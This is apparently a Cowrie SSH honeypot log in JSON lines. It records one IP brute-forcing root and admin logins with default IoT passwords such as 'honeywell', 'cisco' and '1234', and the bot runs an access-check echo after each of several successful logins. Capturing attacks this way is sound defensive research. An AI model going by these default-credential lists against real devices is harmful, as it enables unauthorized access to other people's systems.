{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41432,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0b5eb15e5f8","protocol":"ssh","message":"New connection: 212.227.125.160:41432 (1.2.3.4:22) [session: e0b5eb15e5f8]","sensor":"my-vps","timestamp":"2025-09-09T02:57:06.695917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:07.074575Z","src_ip":"212.227.125.160","session":"e0b5eb15e5f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:07.075561Z","src_ip":"212.227.125.160","session":"e0b5eb15e5f8"}
{"eventid":"cowrie.login.success","username":"root","password":"honeywell","message":"login attempt [root/honeywell] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:08.456986Z","src_ip":"212.227.125.160","session":"e0b5eb15e5f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:08.728538Z","src_ip":"212.227.125.160","session":"e0b5eb15e5f8"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:08.729256Z","src_ip":"212.227.125.160","session":"e0b5eb15e5f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:08.787724Z","src_ip":"212.227.125.160","session":"e0b5eb15e5f8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:08.788711Z","src_ip":"212.227.125.160","session":"e0b5eb15e5f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50798,"dst_ip":"1.2.3.4","dst_port":22,"session":"3715e783d0fb","protocol":"ssh","message":"New connection: 212.227.125.160:50798 (1.2.3.4:22) [session: 3715e783d0fb]","sensor":"my-vps","timestamp":"2025-09-09T02:57:08.847762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:08.868077Z","src_ip":"212.227.125.160","session":"3715e783d0fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:08.916078Z","src_ip":"212.227.125.160","session":"3715e783d0fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"honeywell","message":"login attempt [admin/honeywell] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:09.091065Z","src_ip":"212.227.125.160","session":"3715e783d0fb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:10.139988Z","src_ip":"212.227.125.160","session":"3715e783d0fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57846,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d0afcf8c619","protocol":"ssh","message":"New connection: 212.227.125.160:57846 (1.2.3.4:22) [session: 4d0afcf8c619]","sensor":"my-vps","timestamp":"2025-09-09T02:57:10.181215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:10.188941Z","src_ip":"212.227.125.160","session":"4d0afcf8c619"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:10.228523Z","src_ip":"212.227.125.160","session":"4d0afcf8c619"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:10.407969Z","src_ip":"212.227.125.160","session":"4d0afcf8c619"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:11.462286Z","src_ip":"212.227.125.160","session":"4d0afcf8c619"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38050,"dst_ip":"1.2.3.4","dst_port":22,"session":"5480b1750f36","protocol":"ssh","message":"New connection: 212.227.125.160:38050 (1.2.3.4:22) [session: 5480b1750f36]","sensor":"my-vps","timestamp":"2025-09-09T02:57:11.503120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:11.517139Z","src_ip":"212.227.125.160","session":"5480b1750f36"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:11.557433Z","src_ip":"212.227.125.160","session":"5480b1750f36"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:11.753331Z","src_ip":"212.227.125.160","session":"5480b1750f36"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:12.871394Z","src_ip":"212.227.125.160","session":"5480b1750f36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47250,"dst_ip":"1.2.3.4","dst_port":22,"session":"d927dba7d6a0","protocol":"ssh","message":"New connection: 212.227.125.160:47250 (1.2.3.4:22) [session: d927dba7d6a0]","sensor":"my-vps","timestamp":"2025-09-09T02:57:12.921529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.056618Z","src_ip":"212.227.125.160","session":"d927dba7d6a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.057334Z","src_ip":"212.227.125.160","session":"d927dba7d6a0"}
{"eventid":"cowrie.login.success","username":"root","password":"rootpass","message":"login attempt [root/rootpass] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.419367Z","src_ip":"212.227.125.160","session":"d927dba7d6a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:13.611395Z","src_ip":"212.227.125.160","session":"d927dba7d6a0"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.612019Z","src_ip":"212.227.125.160","session":"d927dba7d6a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.752361Z","src_ip":"212.227.125.160","session":"d927dba7d6a0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.753472Z","src_ip":"212.227.125.160","session":"d927dba7d6a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52374,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc97bf48b7ae","protocol":"ssh","message":"New connection: 212.227.125.160:52374 (1.2.3.4:22) [session: dc97bf48b7ae]","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.807434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.852447Z","src_ip":"212.227.125.160","session":"dc97bf48b7ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:13.853291Z","src_ip":"212.227.125.160","session":"dc97bf48b7ae"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:14.105791Z","src_ip":"212.227.125.160","session":"dc97bf48b7ae"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:15.202516Z","src_ip":"212.227.125.160","session":"dc97bf48b7ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60644,"dst_ip":"1.2.3.4","dst_port":22,"session":"f32ac2b09ff3","protocol":"ssh","message":"New connection: 212.227.125.160:60644 (1.2.3.4:22) [session: f32ac2b09ff3]","sensor":"my-vps","timestamp":"2025-09-09T02:57:15.251070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:15.265963Z","src_ip":"212.227.125.160","session":"f32ac2b09ff3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:15.298128Z","src_ip":"212.227.125.160","session":"f32ac2b09ff3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0000","message":"login attempt [admin/0000] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:15.475053Z","src_ip":"212.227.125.160","session":"f32ac2b09ff3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:16.551041Z","src_ip":"212.227.125.160","session":"f32ac2b09ff3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41232,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2c9729d791d","protocol":"ssh","message":"New connection: 212.227.125.160:41232 (1.2.3.4:22) [session: c2c9729d791d]","sensor":"my-vps","timestamp":"2025-09-09T02:57:16.597550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:16.622047Z","src_ip":"212.227.125.160","session":"c2c9729d791d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:16.644818Z","src_ip":"212.227.125.160","session":"c2c9729d791d"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:16.825757Z","src_ip":"212.227.125.160","session":"c2c9729d791d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:17.947984Z","src_ip":"212.227.125.160","session":"c2c9729d791d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50718,"dst_ip":"1.2.3.4","dst_port":22,"session":"40ed8c1697ad","protocol":"ssh","message":"New connection: 212.227.125.160:50718 (1.2.3.4:22) [session: 40ed8c1697ad]","sensor":"my-vps","timestamp":"2025-09-09T02:57:17.993178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.037220Z","src_ip":"212.227.125.160","session":"40ed8c1697ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.037958Z","src_ip":"212.227.125.160","session":"40ed8c1697ad"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.351480Z","src_ip":"212.227.125.160","session":"40ed8c1697ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:18.465376Z","src_ip":"212.227.125.160","session":"40ed8c1697ad"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.466054Z","src_ip":"212.227.125.160","session":"40ed8c1697ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.509677Z","src_ip":"212.227.125.160","session":"40ed8c1697ad"}
